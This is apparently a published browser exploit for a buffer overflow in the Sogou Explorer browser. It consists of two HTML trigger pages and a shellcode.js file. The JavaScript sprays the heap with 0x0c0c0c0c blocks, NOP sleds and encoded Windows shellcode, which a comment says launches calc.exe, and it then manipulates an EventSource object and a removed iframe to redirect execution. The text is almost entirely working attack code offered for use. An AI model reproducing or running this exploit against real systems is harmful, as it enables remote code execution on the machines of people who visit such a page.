搜狗浏览器缓冲区溢出漏洞EXP

  1. <!–test2.html–>
  2. <html>
  3. <body>
  4. <script>
  5. top.source = new EventSource(“aaat.htm”);
  6. top.source.onerror = function(err) {
  7. top.finish();
  8. };
  9. </script>
  10. </body>
  11. </html>
  12. —————-
  13. <!–test.html–>
  14. <html>
  15. <body>
  16. <iframe id=”test” width=”1″ height=”1″> </iframe>
  17. <script type=”text/javascript” src=”shellcode.js”></script>
  18. <script>
  19. var source;
  20. shellcode();
  21. function timer(){
  22. over();
  23. }
  24. function runTest(){
  25. document.getElementById(“test”).src = “test2.html”;
  26. }
  27. function finish(){
  28. document.body.removeChild(document.getElementById(“test”));
  29. setTimeout(timer,1000);
  30. //gc();
  31. }
  32. runTest();
  33. </script>
  34. <A HREF=”test.html”> go </A>
  35. </body>
  36. <html>
  37. —————-
  38. //shellcode.js
  39. function gc() {
  40. if (typeof GCController !== “undefined”)
  41. GCController.collect();
  42. else {
  43. function gcRec(n) {
  44. if (n < 1)
  45. return {};
  46. var temp = {i: “ab” + i + (i / 100000)};
  47. temp += “foo”;
  48. gcRec(n-1);
  49. }
  50. for (var i = 0; i < 1000; i++)
  51. gcRec(10)
  52. }
  53. }
  54. function shellcode() {
  55. var shell = unescape(“%u6060%u96e9%u0000%u5600%uc931%u8b64%u3071%u768B%u8b0C%u1c76%u468b%u8b08%u207e%u368b%u3966%u184f%uf275%uc35e%u8b60%u246c%u8b24%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u37e3%u8b49%u8b34%uee01%uff31%uc031%uacfc%uc084%u0a74%ucfc1%u010d%ue9c7%ufff1%uffff%u7c3b%u2824%ude75%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%uadc3%u5250%ua7e8%uffff%u89ff%u8107%u08c4%u0000%u8100%u04c7%u0000%u3900%u75ce%uc3e6%u19e8%u0000%u9800%u8afe%u7e0e%ue2d8%u8173%u00ec%u0000%u8900%ue8e5%uff5d%uffff%uc289%ue2eb%u8d5e%u047d%uf189%uc181%u0008%u0000%ub6e8%uffff%uebff%u5b0e%uc031%u5350%u55ff%u9004%u6161%uc031%ue8c3%uffed%uffff%u6163%u636c%u652e%u6578%u0000”);
  56. var block = unescape(“%u0c0c%u0c0c”);
  57. var nops = unescape(“%u9090%u9090%u9090”);
  58. while (block.length <0x4000) block += block;
  59. block=block.substring(0x90);
  60. memory = new Array(1000);
  61. var shellstr=new Array(3);
  62. shellstr[0]=block;
  63. shellstr[1]=nops;
  64. shellstr[2]=shell;
  65. var i;
  66. for (i=0;i<0x1000;i++) memory[i] =shellstr.join(“”);
  67. }
  68. function over(){
  69. var str=unescape(“%u0c0c%u0c0c”);
  70. var str=unescape(“%u0c0c%u0c0c”);
  71. strb=””;
  72. for(i=0;i<0x10000;++i){
  73. if(i<0x40) strb=strb+str;
  74. var sdiv=document.createElement(“div”);
  75. sdiv.innerText=strb;
  76. if(source.readyState==0x0c0c0c0c) {
  77. //alert(“over ok! run calc.exe!”);
  78. url=source.URL;
  79. }
  80. }
  81. }
  82. //http://forum.sysinternals.com/sogou-explorer-buffer-overflow-vulnerability_topic27040.html
  83. //http://sebug.net/vuldb/ssvid-24265